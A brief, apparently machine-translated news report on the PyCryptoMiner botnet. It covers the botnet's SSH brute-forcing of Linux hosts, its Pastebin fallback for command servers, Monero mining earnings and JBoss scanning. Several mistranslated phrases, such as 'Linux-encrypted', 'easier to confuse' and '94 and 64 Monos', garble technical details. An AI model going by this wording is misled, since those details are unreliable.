Security researchers at F5 Networks have discovered a new Linux-encrypted botnet, dubbed “PyCryptoMiner, “that targets Linux systems with public SSH ports. \
According to the researchers, PyCryptoMiner includes the following five features:
1. Based on the Python scripting language, which means it is difficult to detect
2. When the original command and control (C&C) server is unavailable, a new C&C server assignment is received using Pastebin.com (under the username “WHATHAPPEN”)
3. Domain name registrants are linked to more than 36,000 domain names, some of which have been known for fraud, gambling and adult services since 2012
4, used to mine Monero, a highly anonymous cryptocurrency favored by cybercriminals. As of late December 2017, PyCryptoMiner had mined approximately $46,000 worth of Monero coins
5. A new scan feature for vulnerable JBoss servers was rolled out in mid-December using the CVE-2017-12149 vulnerability
Unlike binary malware alternatives, being based on the Python scripting language makes PyCryptoMiner easier to confuse and more circumventive. Also, it is executed by a valid binary file.
PyCryptoMiner propagates by trying to guess the SSH login credentials of the target Linux device, and if successful, it deploys a simple Base64-encoded Python script that connects to the C&C server to download and execute additional Python code.
The Python script also collects information about the infected device, including the host /DNS name, operating system name and architecture, number of cpus, and CPU usage. It also checks to see if the device is infected, and if the infected device is used for Monero coin mining or scanning.
Using information provided on Pastebin[.]com, the researchers confirmed that PyCryptoMiner may have been activated in August 2017. The resource has been viewed 177,987 times in the survey, and is being added about 1,000 times a day.
A query of the domain name “zsw8.cc” for these C&C servers turned up the registrant name as “xinqian Rhys” \
Domain registrants are linked to more than 36,000 domain names, some of which have been known for fraud, gambling and adult services since 2012. \
PyCryptoMiner uses two wallet addresses, 94 and 64 Monos, worth about $46,000.
Python-based botnets turn Linux Machines into Mining robots https://www.oschina.net/news/92261/pycryptominer-linux-machines-turns-monero-mining-botsCopy the code
\
Today’s recommendation
Create blockchains from scratch in Python \
\
Click to read the original article to participate in 2018 Learn web crawler from scratch